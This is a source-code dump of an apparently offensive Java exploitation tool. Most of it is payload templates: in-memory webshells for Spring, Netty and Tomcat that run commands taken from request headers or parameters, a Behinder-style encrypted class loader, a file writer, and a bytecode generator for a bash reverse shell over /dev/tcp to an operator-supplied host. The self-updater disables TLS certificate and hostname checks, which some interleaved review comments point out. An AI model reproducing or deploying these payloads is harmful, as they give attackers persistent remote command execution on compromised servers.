ex.printStackTrace(); 90 | } 91 | } 92 | } catch (IllegalAccessException e) { 93 | e.printStackTrace(); 94 | } catch (IOException e) { 95 | e.printStackTrace(); 96 | } catch (InvocationTargetException e) { 97 | e.printStackTrace(); 98 | } 99 | } 100 | } 101 | -------------------------------------------------------------------------------- 
/src/main/java/com/achuna33/Templates/DynamicInterceptorTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.servlet.handler.HandlerInterceptorAdapter; 5 | import sun.misc.BASE64Decoder; 6 | import javax.crypto.Cipher; 7 | import javax.crypto.spec.SecretKeySpec; 8 | import javax.servlet.ServletRequest; 9 | import javax.servlet.ServletResponse; 10 | import javax.servlet.http.HttpServletRequest; 11 | import javax.servlet.http.HttpServletResponse; 12 | import java.io.File; 13 | import java.io.IOException; 14 | import java.lang.reflect.InvocationTargetException; 15 | import java.lang.reflect.Method; 16 | import java.util.Scanner; 17 | 18 | @Controller 19 | public class DynamicInterceptorTemplate extends HandlerInterceptorAdapter { 20 | 21 | private Class myClassLoaderClazz; 22 | private String basicCmdShellPwd = "rebeyond"; 23 | private String behinderShellHeader = "X-Options-Ai"; 24 | private String behinderShellPwd = "e45e329feb5d925b"; // rebeyond 25 | 26 | public DynamicInterceptorTemplate() { 27 | initialize(); 28 | } 29 | 30 | @Override 31 | public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { 32 | System.out.println("[+] Dynamic Interceptor says hello"); 33 | 34 | if(request.getParameter("type") != null && request.getParameter("type").equals("basic")){ 35 | //basic cmd shell 36 | String cmd = request.getParameter(basicCmdShellPwd); 37 | if(cmd != null && !cmd.isEmpty()){ 38 | String[] cmds = null; 39 | if(File.separator.equals("/")){ 40 | cmds = new String[]{"/bin/sh", "-c", cmd}; 41 | }else{ 42 | cmds = new String[]{"cmd", "/C", cmd}; 43 | } 44 | String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); 45 | response.getWriter().println(result); 46 | 47 | return false; 48 | } 49 | 
}else if(request.getHeader(behinderShellHeader) != null){ 50 | //behind3 shell 51 | try{ 52 | if (request.getMethod().equals("POST")){ 53 | String k = behinderShellPwd; 54 | request.getSession().setAttribute("u",k); 55 | Cipher cipher = Cipher.getInstance("AES"); 56 | cipher.init(2, new SecretKeySpec((request.getSession().getAttribute("u") + "").getBytes(), "AES")); 57 | byte[] evilClassBytes = cipher.doFinal(new BASE64Decoder().decodeBuffer(request.getReader().readLine())); 58 | Class evilClass = (Class) myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke(null, evilClassBytes, Thread.currentThread().getContextClassLoader()); 59 | Object evilObject = evilClass.newInstance(); 60 | Method targetMethod = evilClass.getDeclaredMethod("equals", new Class[]{ServletRequest.class, ServletResponse.class}); 61 | targetMethod.invoke(evilObject, new Object[]{request, response}); 62 | } 63 | }catch(Exception e){ 64 | e.printStackTrace(); 65 | } 66 | 67 | return false; 68 | } 69 | 70 | return true; 71 | } 72 | 73 | private void initialize(){ 74 | try{ 75 | ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); 76 | try{ 77 | this.myClassLoaderClazz = classLoader.loadClass("com.feihong.ldap.template.MyClassLoader"); 78 | } catch (ClassNotFoundException e) { 79 | String code = "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"; 80 | byte[] bytes = new BASE64Decoder().decodeBuffer(code); 81 | 82 | Method method = null; 83 | try { 84 | method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 85 | method.setAccessible(true); 86 | this.myClassLoaderClazz = (Class) method.invoke(classLoader, bytes, 0, bytes.length); 87 | } catch (NoSuchMethodException ex) { 88 | ex.printStackTrace(); 89 | } 90 | } 91 | } catch (IllegalAccessException e) { 92 | e.printStackTrace(); 93 | } catch (IOException e) { 94 | e.printStackTrace(); 95 | } catch (InvocationTargetException e) { 96 | 
e.printStackTrace(); 97 | } 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/MyClassLoader.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | public class MyClassLoader extends ClassLoader { 4 | MyClassLoader(ClassLoader c){super(c);} 5 | 6 | 7 | public static Class defineClass(byte[] bytes, ClassLoader classLoader){ 8 | return new MyClassLoader(classLoader).defineClass(bytes, 0, bytes.length); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/NettyMemshellTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import io.netty.buffer.Unpooled; 4 | import io.netty.channel.*; 5 | import io.netty.handler.codec.http.*; 6 | import io.netty.util.CharsetUtil; 7 | import reactor.netty.ChannelPipelineConfigurer; 8 | import reactor.netty.ConnectionObserver; 9 | 10 | import java.lang.reflect.Array; 11 | import java.lang.reflect.Field; 12 | import java.lang.reflect.Method; 13 | import java.net.SocketAddress; 14 | import java.util.Scanner; 15 | 16 | public class NettyMemshellTemplate extends ChannelDuplexHandler implements ChannelPipelineConfigurer { 17 | public static Object nettymemshell; 18 | public NettyMemshellTemplate(){ 19 | nettymemshell = new NettyMemshellTemplate(""); 20 | doInject(); 21 | } 22 | public NettyMemshellTemplate(String a){ 23 | 24 | } 25 | public static String doInject(){ 26 | String msg = "inject-start"; 27 | try { 28 | Method getThreads = Thread.class.getDeclaredMethod("getThreads"); 29 | getThreads.setAccessible(true); 30 | Object threads = getThreads.invoke(null); 31 | 32 | for (int i = 0; i < Array.getLength(threads); i++) { 33 | Object thread = Array.get(threads, i); 34 | if (thread != null && 
thread.getClass().getName().contains("NettyWebServer")) { 35 | Field _val$disposableServer = thread.getClass().getDeclaredField("val$disposableServer"); 36 | _val$disposableServer.setAccessible(true); 37 | Object val$disposableServer = _val$disposableServer.get(thread); 38 | Field _config = val$disposableServer.getClass().getSuperclass().getDeclaredField("config"); 39 | _config.setAccessible(true); 40 | Object config = _config.get(val$disposableServer); 41 | Field _doOnChannelInit = config.getClass().getSuperclass().getSuperclass().getDeclaredField("doOnChannelInit"); 42 | _doOnChannelInit.setAccessible(true); 43 | _doOnChannelInit.set(config, nettymemshell); 44 | msg = "inject-success"; 45 | return "msg"; 46 | } 47 | } 48 | }catch (Exception e){ 49 | msg = "inject-error"; 50 | } 51 | return msg; 52 | } 53 | 54 | @Override 55 | // Step1. 作为一个ChannelPipelineConfigurer给pipline注册Handler 56 | public void onChannelInit(ConnectionObserver connectionObserver, Channel channel, SocketAddress socketAddress) { 57 | ChannelPipeline pipeline = channel.pipeline(); 58 | // 将内存马的handler添加到spring层handler的前面 59 | pipeline.addBefore("reactor.left.httpTrafficHandler","memshell_handler",new NettyMemshellTemplate()); 60 | } 61 | 62 | 63 | @Override 64 | // Step2. 
作为Handler处理请求,在此实现内存马的功能逻辑 65 | public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception { 66 | if(msg instanceof HttpRequest){ 67 | HttpRequest httpRequest = (HttpRequest)msg; 68 | try { 69 | if(httpRequest.headers().contains("X-CMD")) { 70 | String cmd = httpRequest.headers().get("X-CMD"); 71 | String execResult = new Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); 72 | // 返回执行结果 73 | send(ctx, execResult, HttpResponseStatus.OK); 74 | return; 75 | } 76 | }catch (Exception e){ 77 | e.printStackTrace(); 78 | } 79 | } 80 | ctx.fireChannelRead(msg); 81 | } 82 | 83 | 84 | private void send(ChannelHandlerContext ctx, String context, HttpResponseStatus status) { 85 | FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, status, Unpooled.copiedBuffer(context, CharsetUtil.UTF_8)); 86 | response.headers().set(HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8"); 87 | ctx.writeAndFlush(response).addListener(ChannelFutureListener.CLOSE); 88 | } 89 | 90 | public static void main(String[] args) { 91 | 92 | } 93 | } -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/PutfileTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | import com.achuna33.Utils.*; 3 | import org.objectweb.asm.*; 4 | import com.achuna33.SupportType.MyDIYType; 5 | 6 | import javax.xml.bind.DatatypeConverter; 7 | 8 | import java.io.FileOutputStream; 9 | import java.io.IOException; 10 | import java.util.Arrays; 11 | 12 | import static org.objectweb.asm.Opcodes.*; 13 | import static org.objectweb.asm.Opcodes.RETURN; 14 | 15 | public class PutfileTemplate implements Template{ 16 | private String className; 17 | private byte[] bytes; 18 | private String Path; 19 | private String Content; 20 | public PutfileTemplate(String Path,String Content){ 21 | this.Path = new 
String(Utils.Base64DecodeStr2bytes(Path)); 22 | this.className = "WriteFile"; 23 | this.Content = Content; 24 | generate(); 25 | } 26 | public void cache(){ 27 | Cache.set(className, bytes); 28 | } 29 | public String getClassName(){ 30 | return className; 31 | } 32 | public byte[] getBytes(){ 33 | return bytes; 34 | } 35 | public void generate() { 36 | String WriteFileClassBase64 = "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"; 37 | ClassReader cr = null; 38 | cr = new ClassReader(Utils.Base64DecodeStr2bytes(WriteFileClassBase64)); 39 | ClassWriter cw = new ClassWriter(cr, ClassWriter.COMPUTE_MAXS); 40 | ASMChanger.ModifyAccessVisitor mv = new ASMChanger.ModifyAccessVisitor(ASM6,cw,MyDIYType.PutFile,"",Path,Content); 41 | cr.accept(mv,ClassReader.SKIP_FRAMES); 42 | bytes = cw.toByteArray(); 43 | 44 | } 45 | public static void fileOutputStreamMethod(String filepath, byte[] content) throws IOException { 46 | try { 47 | FileOutputStream fileOutputStream = new FileOutputStream(filepath); 48 | byte[] bytes = content; 49 | fileOutputStream.write(bytes); 50 | }catch (Exception e){ 51 | e.printStackTrace(); 52 | } 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/ReverseShellTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.Utils.*; 4 | import org.objectweb.asm.*; 5 | import static org.objectweb.asm.Opcodes.*; 6 | 7 | public class ReverseShellTemplate implements Template { 8 | private String className; 9 | private byte[] bytes; 10 | private String ip; 11 | private int port; 12 | 13 | public ReverseShellTemplate(String ip, String port){ 14 | this(ip, Integer.parseInt(port)); 15 | } 16 | 17 | 18 | public ReverseShellTemplate(String ip, int port){ 19 | this.ip = ip; 20 | this.port = port; 21 | this.className = "Exploit" + Utils.getRandomString(4); 22 | 23 | generate(); 24 
| } 25 | 26 | public ReverseShellTemplate(String ip, String port, String className){ 27 | this(ip, Integer.parseInt(port)); 28 | this.className = className; 29 | 30 | generate(); 31 | } 32 | 33 | @Override 34 | public String getClassName(){ 35 | return className; 36 | } 37 | 38 | @Override 39 | public byte[] getBytes() { 40 | return bytes; 41 | } 42 | 43 | @Override 44 | public void cache() { 45 | Cache.set(className, bytes); 46 | } 47 | 48 | @Override 49 | public void generate() { 50 | ClassWriter cw = new ClassWriter(0); 51 | FieldVisitor fv; 52 | MethodVisitor mv; 53 | AnnotationVisitor av0; 54 | 55 | cw.visit(V1_6, ACC_PUBLIC + ACC_SUPER, className, null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null); 56 | 57 | 58 | { 59 | fv = cw.visitField(ACC_PRIVATE, "ip", "Ljava/lang/String;", null, null); 60 | fv.visitEnd(); 61 | } 62 | { 63 | fv = cw.visitField(ACC_PRIVATE, "port", "I", null, null); 64 | fv.visitEnd(); 65 | } 66 | { 67 | mv = cw.visitMethod(ACC_PUBLIC, "", "()V", null, null); 68 | mv.visitCode(); 69 | Label l0 = new Label(); 70 | Label l1 = new Label(); 71 | Label l2 = new Label(); 72 | mv.visitTryCatchBlock(l0, l1, l2, "java/lang/Exception"); 73 | Label l3 = new Label(); 74 | mv.visitLabel(l3); 75 | mv.visitLineNumber(12, l3); 76 | mv.visitVarInsn(ALOAD, 0); 77 | mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", "", "()V", false); 78 | Label l4 = new Label(); 79 | mv.visitLabel(l4); 80 | mv.visitLineNumber(13, l4); 81 | mv.visitFieldInsn(GETSTATIC, "java/io/File", "separator", "Ljava/lang/String;"); 82 | mv.visitLdcInsn("/"); 83 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "equals", "(Ljava/lang/Object;)Z", false); 84 | Label l5 = new Label(); 85 | mv.visitJumpInsn(IFEQ, l5); 86 | Label l6 = new Label(); 87 | mv.visitLabel(l6); 88 | mv.visitLineNumber(14, l6); 89 | mv.visitInsn(ICONST_3); 90 | mv.visitTypeInsn(ANEWARRAY, "java/lang/String"); 91 | 
mv.visitInsn(DUP); 92 | mv.visitInsn(ICONST_0); 93 | mv.visitLdcInsn("/bin/bash"); 94 | mv.visitInsn(AASTORE); 95 | mv.visitInsn(DUP); 96 | mv.visitInsn(ICONST_1); 97 | mv.visitLdcInsn("-c"); 98 | mv.visitInsn(AASTORE); 99 | mv.visitInsn(DUP); 100 | mv.visitInsn(ICONST_2); 101 | mv.visitLdcInsn("/bin/bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1"); 102 | mv.visitInsn(AASTORE); 103 | mv.visitVarInsn(ASTORE, 1); 104 | mv.visitLabel(l0); 105 | mv.visitLineNumber(16, l0); 106 | mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false); 107 | mv.visitVarInsn(ALOAD, 1); 108 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "([Ljava/lang/String;)Ljava/lang/Process;", false); 109 | mv.visitInsn(POP); 110 | mv.visitLabel(l1); 111 | mv.visitLineNumber(19, l1); 112 | mv.visitJumpInsn(GOTO, l5); 113 | mv.visitLabel(l2); 114 | mv.visitLineNumber(17, l2); 115 | mv.visitFrame(Opcodes.F_FULL, 2, new Object[]{className, "[Ljava/lang/String;"}, 1, new Object[]{"java/lang/Exception"}); 116 | mv.visitVarInsn(ASTORE, 2); 117 | Label l7 = new Label(); 118 | mv.visitLabel(l7); 119 | mv.visitLineNumber(18, l7); 120 | mv.visitVarInsn(ALOAD, 2); 121 | mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Exception", "printStackTrace", "()V", false); 122 | mv.visitLabel(l5); 123 | mv.visitLineNumber(22, l5); 124 | mv.visitFrame(Opcodes.F_CHOP, 1, null, 0, null); 125 | mv.visitInsn(RETURN); 126 | Label l8 = new Label(); 127 | mv.visitLabel(l8); 128 | mv.visitLocalVariable("e", "Ljava/lang/Exception;", null, l7, l5, 2); 129 | mv.visitLocalVariable("command", "[Ljava/lang/String;", null, l0, l5, 1); 130 | mv.visitLocalVariable("this", "LReverseShell;", null, l3, l8, 0); 131 | mv.visitMaxs(4, 3); 132 | mv.visitEnd(); 133 | } 134 | { 135 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new 
String[]{"com/sun/org/apache/xalan/internal/xsltc/TransletException"}); 136 | mv.visitCode(); 137 | Label l0 = new Label(); 138 | mv.visitLabel(l0); 139 | mv.visitLineNumber(27, l0); 140 | mv.visitInsn(RETURN); 141 | Label l1 = new Label(); 142 | mv.visitLabel(l1); 143 | mv.visitLocalVariable("this", "LReverseShell;", null, l0, l1, 0); 144 | mv.visitLocalVariable("document", "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;", null, l0, l1, 1); 145 | mv.visitLocalVariable("handlers", "[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;", null, l0, l1, 2); 146 | mv.visitMaxs(0, 3); 147 | mv.visitEnd(); 148 | } 149 | { 150 | mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[]{"com/sun/org/apache/xalan/internal/xsltc/TransletException"}); 151 | mv.visitCode(); 152 | Label l0 = new Label(); 153 | mv.visitLabel(l0); 154 | mv.visitLineNumber(32, l0); 155 | mv.visitInsn(RETURN); 156 | Label l1 = new Label(); 157 | mv.visitLabel(l1); 158 | mv.visitLocalVariable("this", "LReverseShell;", null, l0, l1, 0); 159 | mv.visitLocalVariable("document", "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;", null, l0, l1, 1); 160 | mv.visitLocalVariable("iterator", "Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;", null, l0, l1, 2); 161 | mv.visitLocalVariable("handler", "Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;", null, l0, l1, 3); 162 | mv.visitMaxs(0, 4); 163 | mv.visitEnd(); 164 | } 165 | cw.visitEnd(); 166 | bytes = cw.toByteArray(); 167 | } 168 | 169 | } 170 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/Template.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | public interface Template { 4 | void generate(); 5 
| byte[] getBytes(); 6 | void cache(); 7 | String getClassName(); 8 | } 9 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/TomcatEchoTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | import java.lang.reflect.Field; 9 | import java.util.List; 10 | import java.util.Scanner; 11 | 12 | public class TomcatEchoTemplate extends AbstractTranslet { 13 | 14 | public TomcatEchoTemplate(){ 15 | try{ 16 | boolean var4 = false; 17 | Thread[] var5 = (Thread[])getFV(Thread.currentThread().getThreadGroup(), "threads"); 18 | 19 | for(int var6 = 0; var6 < var5.length; ++var6) { 20 | Thread var7 = var5[var6]; 21 | if (var7 != null) { 22 | String var3 = var7.getName(); 23 | if (!var3.contains("exec") && var3.contains("http")) { 24 | Object var1 = getFV(var7, "target"); 25 | if (var1 instanceof Runnable) { 26 | try { 27 | var1 = getFV(getFV(getFV(var1, "this$0"), "handler"), "global"); 28 | } catch (Exception var13) { 29 | continue; 30 | } 31 | 32 | List var9 = (List)getFV(var1, "processors"); 33 | 34 | for(int var10 = 0; var10 < var9.size(); ++var10) { 35 | Object var11 = var9.get(var10); 36 | var1 = getFV(var11, "req"); 37 | Object var2 = var1.getClass().getMethod("getResponse").invoke(var1); 38 | var3 = (String)var1.getClass().getMethod("getHeader", String.class).invoke(var1, "Testecho"); 39 | if (var3 != null && !var3.isEmpty()) { 40 | var2.getClass().getMethod("setStatus", Integer.TYPE).invoke(var2, new Integer(200)); 41 | var2.getClass().getMethod("addHeader", String.class, 
String.class).invoke(var2, "Testecho", var3); 42 | var4 = true; 43 | } 44 | 45 | var3 = (String)var1.getClass().getMethod("getHeader", String.class).invoke(var1, "cmd"); 46 | if (var3 != null && !var3.isEmpty()) { 47 | var2.getClass().getMethod("setStatus", Integer.TYPE).invoke(var2, new Integer(200)); 48 | String[] var12 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var3} : new String[]{"/bin/sh", "-c", var3}; 49 | writeBody(var2, (new Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter("\\A").next().getBytes()); 50 | var4 = true; 51 | } 52 | 53 | if ((var3 == null || var3.isEmpty()) && var4) { 54 | writeBody(var2, System.getProperties().toString().getBytes()); 55 | } 56 | 57 | if (var4) { 58 | break; 59 | } 60 | } 61 | 62 | if (var4) { 63 | break; 64 | } 65 | } 66 | } 67 | } 68 | } 69 | }catch (Exception e){ 70 | e.printStackTrace(); 71 | } 72 | } 73 | 74 | private static void writeBody(Object var0, byte[] var1) throws Exception { 75 | Object var2; 76 | Class var3; 77 | try { 78 | var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk"); 79 | var2 = var3.newInstance(); 80 | var3.getDeclaredMethod("setBytes", byte[].class, Integer.TYPE, Integer.TYPE).invoke(var2, var1, new Integer(0), new Integer(var1.length)); 81 | var0.getClass().getMethod("doWrite", var3).invoke(var0, var2); 82 | } catch (NoSuchMethodException var5) { 83 | var3 = Class.forName("java.nio.ByteBuffer"); 84 | var2 = var3.getDeclaredMethod("wrap", byte[].class).invoke(var3, var1); 85 | var0.getClass().getMethod("doWrite", var3).invoke(var0, var2); 86 | } 87 | 88 | } 89 | 90 | private static Object getFV(Object var0, String var1) throws Exception { 91 | Field var2 = null; 92 | Class var3 = var0.getClass(); 93 | 94 | while(var3 != Object.class) { 95 | try { 96 | var2 = var3.getDeclaredField(var1); 97 | break; 98 | } catch (NoSuchFieldException var5) { 99 | var3 = var3.getSuperclass(); 100 | } 101 | } 102 | 103 | if (var2 == 
null) { 104 | throw new NoSuchFieldException(var1); 105 | } else { 106 | var2.setAccessible(true); 107 | return var2.get(var0); 108 | } 109 | } 110 | 111 | @Override 112 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 113 | 114 | } 115 | 116 | @Override 117 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 118 | 119 | } 120 | } 121 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/myClassTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.SupportType.MyDIYType; 4 | import com.achuna33.Utils.ASMChanger; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.Utils; 7 | import org.objectweb.asm.ClassReader; 8 | import org.objectweb.asm.ClassWriter; 9 | 10 | import java.io.File; 11 | import java.io.FileInputStream; 12 | import java.io.FileOutputStream; 13 | import java.io.IOException; 14 | 15 | import static org.objectweb.asm.Opcodes.ASM6; 16 | 17 | public class myClassTemplate implements Template{ 18 | private String className; 19 | private byte[] bytes; 20 | public myClassTemplate(String className){ 21 | 22 | this.className = className; 23 | generate(); 24 | } 25 | public void cache(){ 26 | Cache.set(className, bytes); 27 | } 28 | public String getClassName(){ 29 | return className; 30 | } 31 | public byte[] getBytes(){ 32 | return bytes; 33 | } 34 | public void generate() { 35 | 36 | try{ 37 | 38 | String path = System.getProperty("user.dir") + File.separator + "lib" + File.separator + className+".class"; 39 | 40 | FileInputStream fis = new FileInputStream(path); 41 | byte[] buf = new byte[fis.available()]; 42 | System.out.println("[*]In Your path:"+path); 43 | System.out.println("[* File Size :"+String.valueOf(fis.available()) ); 44 | fis.read(buf); 45 | 
fis.close();
46 |
47 | bytes = buf;
48 | }catch (Exception e){
49 | e.printStackTrace();
50 | }
51 | }
/**
 * Writes content to filepath.
 * NOTE(review): the FileOutputStream is never closed, and the catch(Exception) prints and swallows every failure, so
 * the declared IOException is never actually thrown and callers cannot tell whether the write succeeded. Not
 * referenced in the visible code.
 *
 * @param filepath destination path
 * @param content bytes to write
 */
52 | public static void fileOutputStreamMethod(String filepath, byte[] content) throws IOException {
53 | try {
54 | FileOutputStream fileOutputStream = new FileOutputStream(filepath);
55 | byte[] bytes = content;
56 | fileOutputStream.write(bytes);
57 | }catch (Exception e){
58 | e.printStackTrace();
59 | }
60 | }
61 | }
62 |
--------------------------------------------------------------------------------
/src/main/java/com/achuna33/Update/Update.java:
--------------------------------------------------------------------------------
1 | package com.achuna33.Update;
2 |
3 | import com.achuna33.Utils.Cache;
4 | import com.achuna33.Utils.HttpRequest;
5 | import com.achuna33.Utils.Response;
6 |
7 | import javax.net.ssl.*;
8 | import java.io.*;
9 | import java.net.HttpURLConnection;
10 | import java.net.MalformedURLException;
11 | import java.net.StandardSocketOptions;
12 | import java.net.URL;
13 | import java.nio.charset.Charset;
14 | import java.security.SecureRandom;
15 | import java.security.cert.CertificateException;
16 | import java.security.cert.X509Certificate;
17 |
18 | import static com.achuna33.Utils.Cache.WriteLogBase;
19 |
/* Self-updater thread: reads the NewVersionUrl page from GitHub, extracts the download URL from the page body and
   downloads the new JAR into the directory holding the running JAR (see download() for the TLS caveats). */
20 | public class Update extends Thread{
21 | public Update(){}
/* NOTE(review): every exception from goUpdate() is silently discarded (empty catch), so a failed update leaves no
   trace beyond the log lines goUpdate itself writes. */
22 | @Override
23 | public void run(){
24 | try {
25 | goUpdate();
26 | }catch (Exception e){}
27 | }
/**
 * Checks for and applies an update.
 * Flow: fetch the version page (statusCode 0 is treated as a timeout), extract the URL, derive the local JAR's
 * directory and file name from the code source, skip when the names already match, else download.
 *
 * @throws MalformedURLException from HttpRequest when the fixed GitHub URL cannot be parsed
 */
28 | public void goUpdate() throws MalformedURLException {
29 | WriteLogBase("\n[*]开始下载");
30 | HttpRequest httpRequest = new HttpRequest("https://github.com/zhaoyumi/MYExploit/blob/main/NewVersionUrl");
31 | Response response = httpRequest.Get("");
32 | if (response.statusCode==0){
33 | WriteLogBase("\n[*]连接超时");
34 | return;
35 | }
36 | try {
/* NOTE(review): the split separators print as empty strings here. Angle-bracket content appears stripped throughout
   this dump (generic type arguments are missing elsewhere), so the real separators are presumably HTML tags around
   the URL; as printed, split("") would split the body into single characters. */
37 | String url = response.responseBody.split("")[1].split("")[0];
38 | String path = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath();
/* drops the leading "/" of the code-source path (presumably for Windows "/C:/..." paths; re-added on macOS, see
   the next chunk) */
39 | path = path.substring(1);
40 | String localname 
=path.substring(path.lastIndexOf("/")+1);
41 | path = path.substring(0,path.lastIndexOf("/"));
42 |
43 | if (System.getProperties().getProperty("os.name").toLowerCase().contains("mac os")){
44 | path = "/" + path;
45 | }
46 | path = java.net.URLDecoder.decode(path,"UTF-8");
47 | WriteLogBase("\n[*] 下载地址 "+path);
48 | WriteLogBase("\n[*] 远程地址 "+url);
49 | String filename =url.substring(url.lastIndexOf("/")+1);
/* "already current" is decided by comparing file names only: no version ordering and no hash or signature check of
   the artefact that will replace the running JAR. */
50 | if (localname.equals(filename)){
51 | WriteLogBase("\n[*]已经是最新版本了 无需更新");
52 | return;
53 | }
54 |
55 | if (download(url,path,filename)){
56 | WriteLogBase("\n[*]更新成功");
57 | }else {
58 | WriteLogBase("\n[*]更新失败 :( 请手动下载");
59 |
60 | }
61 | System.out.println(url);
62 | //String path = System.getProperty("java.io.tmpdir") + filename;
63 | //= path.substring(1);
64 |
65 | }catch (Exception e){
66 | WriteLogBase("\n[*]下载失败"+"\n"+e.toString());
67 | return;
68 | }
69 | }
/**
 * Runs cmd with Runtime.exec(String) (whitespace-tokenised, no shell) and returns its stdout decoded as GBK, or
 * null when exec/wait fails (the exception is printed). Not referenced in the visible code.
 * NOTE(review): only stdout is drained; a process that writes a lot to stderr can block on the full pipe before
 * waitFor() returns. The InterruptedException handler does not re-interrupt the thread.
 *
 * @param cmd command line to execute
 * @return captured stdout, one "\n" per line, or null on failure
 */
70 | public static String runCmd(String cmd) {
71 |
72 | //WriteLogBase("\n" + cmd);
73 |
74 | String result="";
75 | try {
76 | Process ps = Runtime.getRuntime().exec(cmd);
77 | BufferedReader br = new BufferedReader(new InputStreamReader(ps.getInputStream(), Charset.forName("GBK")));
78 | String line = null;
79 | while ((line = br.readLine()) != null) {
80 | // WriteLogBase(line);
81 | System.out.println(line);
82 | result+=line+"\n";
83 | }
84 | br.close();
85 | System.out.println("close ... 
");
86 | ps.waitFor();
87 | System.out.println("wait over ...");
88 | return result;
89 | } catch (IOException ioe) {
90 | ioe.printStackTrace();
91 | } catch (InterruptedException e) {
92 |
93 | // TODO Auto-generated catch block
94 | e.printStackTrace();
95 |
96 | }
97 | System.out.println("child thread donn");
98 | return null;
99 | }
100 |
101 |
/* Developer test entry point with a hard-coded local Windows path. It calls download() directly, which logs through
   WriteLogBase -> Platform.runLater and so presumably needs the JavaFX toolkit to be running. */
102 | public static void main(String[] args) throws Exception {
103 | String url = "https://github.com/zhaoyumi/MYExploit/releases/download/v2.0.5/MYExploit-2.0.5-SNAPSHOT.jar";
104 | System.out.println(url.substring(url.lastIndexOf("/")+1));
105 | download("https://github.com/zhaoyumi/MYExploit/releases/download/v2.0.5/MYExploit-2.0.5-SNAPSHOT.jar","C:\\Users\\Chun\\Desktop\\MYExploit","MYExploit-1.0-SNAPSHOT.jar");
106 | }
/**
 * Downloads urlPath to targetDirectory/fileName over HTTPS.
 * SECURITY NOTE(review): the connection uses the trust-all HttpsTrustManager and a HostnameVerifier that always
 * returns true, so certificate and host-name validation are disabled for the very download that replaces the tool's
 * own JAR. Anyone who can interpose on the connection can substitute the artefact (a supply-chain risk for the
 * operator), and the file is not checked against a hash or signature. Mitigation: drop the custom TrustManager and
 * HostnameVerifier (the JDK's default trust store validates the GitHub certificate chain) and verify a published
 * checksum or signature before writing the file. contentType and total are read but never used; a negative
 * content length is only logged and the download proceeds. The method continues on the next chunk.
 *
 * @param urlPath HTTPS URL to fetch
 * @param targetDirectory directory to write into
 * @param fileName name of the file to create
 * @return true when the file was written, false when a file of that name already exists
 * @throws Exception on SSL setup or I/O failure
 */
107 | public static boolean download(String urlPath , String targetDirectory,String fileName) throws Exception {
108 | // handle a URL that may contain Chinese characters
109 | URL url = new URL(urlPath);
110 | WriteLogBase("\n[*]下载中.............请等待。");
111 | HttpsURLConnection http = (HttpsURLConnection)url.openConnection();
112 | http.setConnectTimeout(8000);
113 | TrustManager[] trustManagers = {new HttpsTrustManager()};
114 | SSLContext context = SSLContext.getInstance("TLS");
115 | context.init(null, trustManagers, new SecureRandom());
